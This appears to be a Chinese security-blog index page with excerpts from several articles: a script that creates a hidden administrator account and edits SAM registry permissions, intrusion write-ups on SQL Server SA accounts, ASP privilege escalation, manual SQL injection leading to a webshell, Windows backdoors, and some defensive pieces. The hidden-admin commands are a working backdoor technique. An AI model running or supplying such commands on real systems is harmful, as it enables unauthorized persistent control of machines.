添加隐藏用户脚本

net user admins$ 1234567 /add
net localgroup administrators admins$ /add
Echo HKEY_LOCAL_MACHINE\SAM [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1] >>c:/tem.ini
...

标签:

计算机检查漏洞方法和相应处理

近来黑客攻击事件频频发生,我们身边的朋友可能有qq、E-mail和游戏账号被盗事件发生。现在的黑客技术有朝着大众化方向发展的趋势,能够掌握攻击他人系统技术的人越来越多了,只要你的电脑稍微有点系统Bug或者安装了有问题的应用程序,就有可能成为他人的肉鸡。如何给一台上网的机器查漏洞并做出相应的处理呢?

  一、要命的端口

  计算机要与外界进行通信,必须通过一些端口。别人要想入侵和控制我们的电脑,也要从某些端口连接进来。如果开放了139、445、3389、4899等重要端口,要知道这些端口都可以为黑客入侵提供便利。尤其是4899,可能是入侵者安装的后门工具Radmin打开的,他可以通过这个端口取得系统的完全控制权。

...

标签:

Microsoft SQL Server SA权限最新入侵方法

Microsoft SQL Server SA权限服务器一直是黑客青睐的对象,笔者在51CTO网站也曾经发表过三篇相关的攻防文章(SA弱口令带来的安全隐患Microsoft SQL Server SA弱口令攻防实战SQL Server SA空口令的渗透测试日记),本文再向大家介绍几种入侵方法,读者可以根据情况找出防范办法。

标签:

追踪黑客留下的踪迹

 已近年终,城里的白领、乡下的阿姨都开始开始忙年货,在网上有那么一群人也开始忙活起来,为他们的年终奖金而“奋斗”,那就是职业“黑客”,他们窃取数据为自己谋一个温饱或者寻找更大的幸福,乃至奔驰、宝马。在这样的环境下,我管理的服务器收到大量的日志。注入拦截日志,批量扫描拦截日志,敏感文件拦截日志等等呈几何式增长,IIS的日志不断刷新着记录,100m,200m,1G,2G......有些网站仅日志一项都拿去了他们自身数据10倍乃至100倍的容量,当然这个日志主要与网络流量有关。
...

标签:

WINDOWS系统后门四例

后门是攻击者出入系统的通道,惟其如此它隐蔽而危险。攻击者利用后门技术如入无人之境,这是用户的耻辱。针对Windows系统的后门是比较多的,对于一般的后门也为大家所熟知。下面笔者揭秘四个可能不为大家所了解但又非常危险的后门。

  1、嗅探欺骗,最危险的后门

  这类后门是攻击者在控制了主机之后,并不创建新的帐户而是在主机上安装嗅探工具窃取管理员的密码。由于此类后门,并不创建新的帐户而是通过嗅探获取的管理员密码登录系统,因此隐蔽性极高,如果管理员安全意识不高并缺少足够的安全技能的话是根本发现不了的。

...

标签:

改变asp权限的教程

asp.dll解析成system提升权限
网络上传统的提升asp权限为系统的有两种:
1.图形化下的,把默认站点---->主目录--->应用程序保护设置为低,这样就可以把asp权限设置为system.
但这种提升方法很容易被发现,所以网络有另一种一般是用adsutil.vbs来提升权限.而这个也是今天
我要谈的关于adsutil.vbs提升权限.
2.用adsutil.vbs搞定.
在网络上我看到了很多的教你用这种方法的动画,文章,但我至今没有看到一篇介绍原理的,下面我谈谈我个人的看法:
...

标签:

手工注入,后台另类拿webshell搞定影院系统

作者:rabbitsafe
大家好,我是rabbitsafe,这是本人开始研究asp程序发现的第一个漏洞,就是一个注入漏洞,但是只能用手工注入,工具检测不了的.我花了三天想出了从注入到后台拿webshell,因为后台拿webshell这种方法网上还没有,反正我是没看见过,应该算是原创,方法比较另类,大家往下看就知道了,开始讲入正题.
今天我要检测的是一个影院系统,好像叫蚂蚁影院系统.存在注入的文件叫wantlogin.asp代码. (图1)
...

标签:

phpzip

像phpspy不能打包压缩目录也不能压缩成文件,它是在内存里直接下载,而且也不具备排除功能。

本程序能打包目录及子目录, 能排除指定的文件类型, 不仅能直接生成zip下载, 而且可以在文件系统里生成zip文件包。

下载地址:http://www.t00ls.net/attachment.php?aid=NDcyMXxmYmM1MzRjNnwxMjY1MjY1OTUwfGI5MTdDUUJpamxvTlRNVHFOcU8rTEYvN1RtcUo0amZibGtpc0hXSSswcjAvSFBj

...

标签:

十种攻击行为,您能顶住几个?

近几年,互联网的应用呈现出一种爆发增长的态势,网速越来越快,能够遍寻的软件越来越多,初级黑客凭借一些入门的教程和软件就能发起简单的攻击;另一方面,电脑的价格持续下降,企业内部的终端数量也在逐步增加,更多的资源,更复杂的网络使得IT运维人员在管控内网时心力交瘁,面对这些内忧外患,我们不得不重新审视网络安全问题。
下面,我们将介绍一些攻击行为案例,对于这些行为不知您是否遇到过?您的网络是否能够抵挡住这些攻击?您都做了哪些防范?如果对于攻击行为您并没有全面、细致、合规的操作不妨看看我们的建议和意见吧。

...

标签:

一场发生在餐厅里的电子攻防战

“你们的设备又出现问题了,我不管你在哪里,你就是坐火箭也得给我马上赶到餐馆来。”从“外婆桥”餐厅经理阳辉怒气冲冲的电话中,李纯感觉到了事态的严重性。李纯是一家软件公司的销售经理,负责湖南衡阳地区的销售工作,“外婆桥”使用的数字化点菜系统正是他们公司的产品。这是李纯在衡阳当地做成的第一单,他格外重视这个客 户,于是接到电话后立即

标签: